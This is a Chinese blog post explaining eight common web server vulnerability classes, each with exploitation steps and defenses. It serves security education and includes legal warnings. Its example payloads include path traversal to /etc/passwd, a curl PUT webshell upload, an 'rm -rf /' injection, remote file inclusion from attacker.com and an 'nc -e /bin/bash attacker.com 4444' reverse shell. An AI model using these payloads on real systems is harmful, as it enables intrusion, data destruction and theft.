Web服务器特有的安全漏洞及渗透测试利用方法(通俗易懂)

原创 于 2025-08-21 00:13:02 发布 · 1k 阅读 · 13 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #服务器 #运维 #网络安全 #后端 #系统安全 #web安全

任何编程语言和软件项目,亦或硬件设备,都会存在安全漏洞,只有漏洞利用成本的高低!

本文章仅提供学习,切勿将其用于不法手段!

一、目录遍历漏洞(偷偷翻服务器的抽屉)​

原理​:
Web服务器配置不当,允许用户通过../这样的路径跳转访问隐藏目录,比如访问/网站目录/../系统文件,直接查看服务器敏感文件。
渗透测试利用方法​:

  1. 手动试探路径​:在浏览器输入类似http://example.com/../../etc/passwd(Linux系统密码文件)。
  2. 工具批量探测​:用DirBuster工具自动尝试各种路径组合,寻找可访问的隐藏文件。
  3. 获取关键信息​:找到数据库配置文件或备份文件,直接下载后破解密码。

防御​:

  • 关闭服务器目录浏览功能(如Apache设置Options -Indexes)。
  • 限制敏感目录权限,禁止直接访问系统文件。
二、HTTP方法滥用(乱用请求指令)​

原理​:
Web服务器默认支持PUTDELETE等高危HTTP方法,攻击者用这些方法上传文件或删除数据。
渗透测试利用方法​:

  1. 探测支持的方法​:用curl -X OPTIONS http://example.com查看服务器支持的HTTP方法。
  2. 利用PUT上传木马​:若支持PUT,直接上传WebShell文件: 
    curl -X PUT -F "file=@shell.php" http://example.com/upload
  3. 执行恶意操作​:通过上传的WebShell控制服务器。

防御​:

  • 禁用不必要的HTTP方法(如Nginx配置limit_except GET POST)。
  • 对上传文件严格校验类型和大小。
三、配置错误暴露信息(门牌写错成身份证号)​

原理​:
服务器错误配置导致暴露版本号(如Server: Apache/2.4.53),攻击者根据版本号查找已知漏洞。
渗透测试利用方法​:

  1. 扫描服务器指纹​:用nmap -sV example.com探测服务版本。
  2. 查漏洞库​:在CVE官网搜索该版本已知漏洞(如Apache的CVE-2023-XXXX)。
  3. 针对性攻击​:利用漏洞上传WebShell或执行命令。

防御​:

  • 修改服务器Banner信息(如Apache配置ServerTokens Prod)。
  • 定期更新服务器软件到最新版本。
四、CGI脚本漏洞(脚本变后门)​

原理​:
CGI脚本(如PHP、Python)处理用户输入时未过滤特殊字符,导致执行恶意命令。
渗透测试利用方法​:

  1. 构造恶意参数​:在URL中注入命令,如http://example.com/test.php?cmd=rm -rf /
  2. 利用解析漏洞​:上传.php.jpg文件,绕过文件类型检查后执行PHP代码。
  3. 提权控制​:通过CGI脚本创建系统用户或开启SSH服务。

防御​:

  • 禁用危险函数(如PHP的system()exec())。
  • 对CGI脚本输入参数严格过滤和转义。
五、文件包含漏洞(偷换网页内容)​

原理​:
Web程序允许通过参数动态包含文件(如include($_GET['page'].'.php')),攻击者篡改参数加载恶意文件。
渗透测试利用方法​:

  1. 本地文件包含​:输入?page=../../etc/passwd读取系统文件。
  2. 远程文件包含​:输入?page=http://attacker.com/shell.php加载远程木马。
  3. 执行任意代码​:通过包含的恶意文件获取服务器权限。

防御​:

  • 限制包含路径为固定目录(如/var/www/html)。
  • 关闭动态包含功能,改用静态页面。
六、未授权访问漏洞(白嫖管理员权限)​

原理​:
未对敏感页面(如后台管理界面)做权限验证,攻击者直接访问即可操作。
渗透测试利用方法​:

  1. 暴力扫描后台路径​:用御剑扫描工具尝试常见后台地址(如/admin/manage)。
  2. 绕过登录验证​:删除Cookie或修改返回包中的状态码(如将401改为200)。
  3. 提权操作​:进入后台后导出数据库或修改系统配置。

防御​:

  • 强制登录验证,设置复杂密码和验证码。
  • 隐藏后台路径,使用随机字符串命名。
七、命令注入漏洞(服务器变提线木偶)​

原理​:
Web应用将用户输入直接拼接到系统命令中执行(如ping 127.0.0.1),攻击者注入恶意命令。
渗透测试利用方法​:

  1. 注入分号命令​:输入127.0.0.1; ls -al查看服务器文件。
  2. 反弹Shell​:输入127.0.0.1 | nc -e /bin/bash attacker.com 4444建立反向连接。
  3. 控制服务器​:通过Shell上传WebShell或执行挖矿程序。

防御​:

  • 使用参数化查询,禁止用户输入拼接命令。
  • 对特殊字符(如;|)进行过滤。
八、敏感信息泄露(服务器裸奔)​

原理​:
错误页面、日志文件或配置文件中暴露数据库密码、API密钥等敏感信息。
渗透测试利用方法​:

  1. 触发错误页面​:访问不存在的页面,观察是否显示数据库错误信息。
  2. 下载配置文件​:通过路径遍历获取config.php,提取数据库账号。
  3. 社工攻击​:用泄露的邮箱信息伪装成管理员钓鱼。

防御​:

  • 自定义错误页面,隐藏技术细节。
  • 定期清理日志,禁止存储明文密码。

总结:Web服务器安全“三防”

  1. 防配置错误​:定期检查服务器设置,关闭高危功能。
  2. 防输入失控​:对所有用户输入过滤和转义。
  3. 防权限漏洞​:最小化服务权限,隔离敏感文件。

一句话口诀​:

路径别乱跳,命令别乱跑,信息藏好别外泄,攻击全挡掉!

注​:所有技术研究需遵循《网络安全法》及《数据安全法》相关规定,践行合法合规的网络安全技术探索

提示:最有效的防御办法,是让攻击者由于攻击成本过高,而主动放弃针对目标进行攻击!

没有攻不破的城墙,只有 由于 付出成本 远超于 收获价值 而 选择 主动放弃 攻击行为 的 敌人 !

警告:任何渗透测试行为,都必须在合法合规的法律框架下进行!任何未经合法授权的渗透测试行为,都是违法的!任何未经合法授权的渗透测试行为,都是违法的!任何未经合法授权的渗透测试行为,都是违法的!重要的事情,说三遍 !!!

黑客影儿
关注
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
渗透测试信息收集 之 【找到你想要的IP-收集真实IP】 这个渗透知识点你需要知道是什么 渗透测试如何开展好好说给你听听 !
盾悟
07-15 1万+
以上两者一种是利用windows自带的黑窗口ping进行的一种探测方法。另外一种是以工具进行超级ping的方式进行的一种探测是否开启了CDN加速服务。Linux 上使用dig命令也可以进行CDN探索 其使用的方法和ping差不多这个自行研究即可。绕过CDN拿到真实IP行了上面铺垫了这么多,这个小段落我们就开始来讲讲如何绕过CDN从而拿到真实IP。CDN解释一下是个啥:解决因传输距离和不同运营商节点造成的网速性能底下的问题。
漏洞利用技术讲解,漏洞分析与利用技巧
白帽子凯哥聊黑客
12-07 4557
网络安全领域,我经常会被问到关于漏洞利用的问题。作为一个长期从事网络安全研究的小哥哥,我明白漏洞利用的重要性,将通过这篇文章分享给大家。
渗透测试】最详细的介绍和流程方法(建议收藏)
2301_77472496的博客
06-08 4000
渗透测试就是模拟攻击者入侵系统,对系统进行一步步地渗透,发现系统地脆弱环节和隐藏风险。最后形成测试报告提供给系统所有者。系统所有者可根据该测试报告对系统进行加固,提升系统的安全性,防止真正的攻击者入侵。渗透测试的前提一定是得经过系统所有者的授权!未经过授权的渗透测试,就是违法行为!
渗透测试基础』| 什么是渗透测试?有哪些常用方法?如何开展?测试工具有哪些?优势在哪里?
虫无涯的博客
12-04 7797
渗透测试是指由专业的安全人员模拟黑客,从系统可能存在的漏洞位置进行攻击测试,找到隐藏的安全漏洞,从而达到保护系统安全的目的;书中有一个例子说的非常不错:把软件系统比喻一座房子,房子建好后会配备一些安全措施,比如防盗门、安全警报等。一般情况,我们认为这已经足够安全,但我们不能十分确认入侵者会使用怎样的方式找到漏洞,从而攻击我们的安全防线。为了保护房子足够安全,我们会聘请外部的安全专家进行一系列的检测,比如检测防盗门是否牢固,窗户是否容易被侵入等等,发现这个房子是否存在漏洞,确保房子的安全性。
常见漏洞原理、利用方式及修复方式----SQL注入及XSS
qq_37698661的博客
03-01 5045
sqli 1、原理: (1)将SQL语句插入或添加到应用(用户)的输入参数中,再将这些参数传递给后台的SQL服务器加以解析并执行。 (2)刚开始接触sqli,首先我们得明白常见的web架构是怎么样的,通俗点来说,也就是所有的浏览器通过表示层来访问一个网站,其具体的工作流程是什么样的? 流程:浏览器发起一个请求,并将请求交给服务器服务器当中运行着Apache\Nginx等中间件来解析请求,当对请求中的网站进行解析的时候,需要用到解析脚本(ASP\PHP\JSP.NET),而存储层的东西是不能直接使用的,所以
漏洞利用总结与解决方案】
YiWei2019的博客
04-07 1546
漏洞利用总结与解决方案0x01 漏洞总结0x02 解决方案 0x01 漏洞总结 漏洞利用方式,在我看来无外乎五种: 其一,修改下一个函数执行地址为目标函数地址,如堆栈溢出、UAF、%n、数组越界、整数溢出 其二,读取堆栈空间数据信息。如格式化字符、堆栈溢出、数组越界、整数溢出 其三,语句注入,如SQL注入、XSS注入 其四,程序异常 其五,伪装用户或服务,如跨站攻击、劫持、欺骗 0x02 解决方案 其一,保持良好的安全编码习惯,可参考华为,阿里等大公司的安全编码规范 其二,参数特殊字符过滤,语句预处理 其三
Web安全攻防:渗透测试实战指南(徐焱)(Z-Library)
2301_78440479的博客
10-09 1601
徐焱,北京交通大学长三角研究院安全研究员。2002年接触网络安全,主要研究方向是内网渗透和APT攻击,有丰富的网络安全渗透经验。已出版图书《网络攻防实战研究:漏洞利用与提权》,曾在《黑客防线》、《黑客X档案》、《黑客手册》、FreeBuf、360安全客、阿里云盾先知、嘶吼等杂志和媒体上发表过多篇技术文章。李文轩,常用ID:遗忘。曾任天融信渗透测试工程师,现任奇虎360攻防实验室安全研究员,擅长渗透测试、无线电安全,活跃于多个漏洞报告平台,报告过多个CVE漏洞,参与360安全客季刊的编辑审核。
web安全测试入门
m0_62410106的博客
09-17 1525
安全测试:安全性测试指有关验证应用程序的安全等级和识别潜在安全性缺陷的过程导致软件出现安全问题的主要原因或根源是软件的安全漏洞安全漏洞:特指在硬件、软件、协议的在逻辑设计上或具体实现或系统安全策略上存在的缺陷或错误漏洞的产生主要是由于程序员不正确和不安全变成引起的不法者可以通过漏洞获取系统额外权限并对系统植入木马、病毒、以窃取系统资料威胁到系统安全的错误才是漏洞安全漏洞危害系统完整性:非法串改破坏数据的完整性系统可用性:破坏系统或者网络,导致服务不可用。
【愚公系列】2024年03月 《CTF实战:从入门到提升》 009-Web安全入门(PHP文件包含漏洞
热门推荐
时光隧道
03-01 9万+
PHP文件包含漏洞是指在PHP代码中存在安全漏洞,允许攻击者包含并执行恶意文件或代码。PHP文件包含漏洞通常发生在以下两种情况下:动态文件包含:当PHP代码使用动态输入来包含文件时,攻击者可能通过构造恶意输入来包含并执行任意文件。这可能会导致攻击者执行远程代码、读取服务器上的敏感文件,或者执行其他恶意操作。本地文件包含:当PHP代码使用本地文件路径来包含文件时,攻击者可能通过修改文件路径参数来包含并执行任意文件。这可能会导致攻击者读取服务器上的敏感文件,或者执行其他恶意操作。
五种利用本地包含漏洞的方式
weixin_33694172的博客
09-25 1098
本文讲的是五种利用本地包含漏洞的方式,本地文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include fuction.php?>就可以调用内部定义的函数。 本...
2024版最新148款CTF工具整理大全(附下载安装包)含基础环境、Web 安全、加密解密、密码爆破、文件、隐写、逆向、PWN等全套工具
最新发布
Libra1313的博客
10-23 1万+
经常会有大学生粉丝朋友私信大白,想通过打CTF比赛镀金,作为进入一线互联网大厂的门票。但是在CTF做题很多的时候都会用到工具,所以在全网苦寻CTF比赛工具安装包!
10大Web漏洞扫描工具
weixin_30407099的博客
06-20 9672
Web scan tool 推荐10大Web漏洞扫描程序 Nikto 这是一个开源的Web服务器扫描程序,它可以对Web服务器的多种项目(包括3500个潜在的危险文件/CGI,以及超过900个服务器版本,还有250多个服务器上的版本特定问题)进行全面的测试。其扫描项目和插件经常更新并且可以自动更新(如果需要的话)。 Nikto可以在尽可能短的周期内测试你的Web服务器,这在其日志文件中相当明显。...
常见的漏洞以及渗透工具使用
Trave-ler
09-14 1414
一、渗透工具 一、sqlmap 1.判断是否存在注入 假设目标注入点是http://192.168.1.104/sql1/Less-1/?id=11 判断命令 sqlmap.py-u http://192.168.1.104/sql1/Less-1/?id=1 还有一种情况,当注入点后面的参数大于等于两个时,需要加双引号,如下所示。 sqlmap.py-u"http://192.168.1.104/sql1/Less-1/?id=1&uid=2" 2.判断文本中的请求是否存在注入 从文件中加载HTT
神仙级渗透测试入门教程(非常详细),从零基础入门到精通,从看这篇开始!
libaiup的博客
06-18 1万+
渗透测试:指的是试图利用系统、网络、人力资源或实物资产中的弱点或漏洞,以对安全控制的有效性进行压力测试。
最全的渗透测试具体详细检测方法
2301_76694151的博客
04-24 1909
Docker是一个开放源代码软件项目,让应用程序布署在软件容器下的工作可以自动化进行,借此在Linux操作系统上,提供一个额外的软件抽象层,以及操作系统层虚拟化的自动管理机制[1]。Hadoop=HDFS(文件系统,数据存储技术相关)+ Mapreduce(数据处理),Hadoop的数据来源可以是任何形式,在处理半结构化和非结构化数据上与关系型数据库相比有更好的性能,具有更灵活的处理能力,不管任何数据形式最终会转化为key/value,key/value是基本数据单元。由于它是代码,整个过程易于重复。
安全渗透测试 服务器 系统,一次完整的安全渗透测试
weixin_36422050的博客
08-05 1373
网络渗透测试就是利用所有的手段进行测试,发现和挖掘系统中存在的漏洞,然后撰写渗透测试报告,将其提供给客户;客户根据渗透人员提供的渗透测试报告对系统存在漏洞和问题的地方进行修复和修补,本次渗透测试算是针对aspx类型的网站系统的一个补充。下面是整个渗透过程和一些渗透思路,写出来跟大家一起探讨和分享,不到之处请指正。()初步的安全渗透测试1.漏洞扫描直接打开JSky Web漏洞扫描器,新建一个扫描任...
干货丨渗透测试常用方法总结,大神之笔!
liuhyusb的博客
12-19 1235
信息收集漏洞验证/漏洞攻击提权,权限维持日志清理一般先运行端口扫描和漏洞扫描获取可以利用漏洞。多利用搜索引擎有授权的情况下直接使用 nmap 、masscan 、自己写py脚本等端口扫描工具直接获取开放的端口和获取服务端的 banner 信息。使用 Python 端口扫描的介绍https://thief.one/2018/05/17/1/?
渗透测试方法共有多少种方法
VN520的博客
04-06 3339
每种方法渗透测试都需要特定的知识、方法和工具来执行,并且。网络服务渗透测试是最常见的渗透测试类型之一。该种渗透测试,是在组织的网络基础设施(服务器、防火墙、交换机、路由器、打印机、工作站等)中识别出最暴露的漏洞安全弱点,然后再被利用。执行鉴于网络为企业提供关键任务服务,以上攻击建议至少每年执行一次内网和外网网络渗透测试。这将为的企业提供足够的覆盖范围以抵御这些攻击媒介。Web 应用程序渗透测试,用于发现基于 Web 的应用程序中的漏洞安全弱点。
WEB端功能测试方法全解析与实用用例指南
本文所涉及的资料《WEB端测试方法大全,通俗而又很实用的测试方法》全面覆盖了从基础输入验证到复杂权限管理、从测试用例设计到回归测试策略选择等多个关键测试领域,具有极强的实践指导意义。以下将围绕标题、描述...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值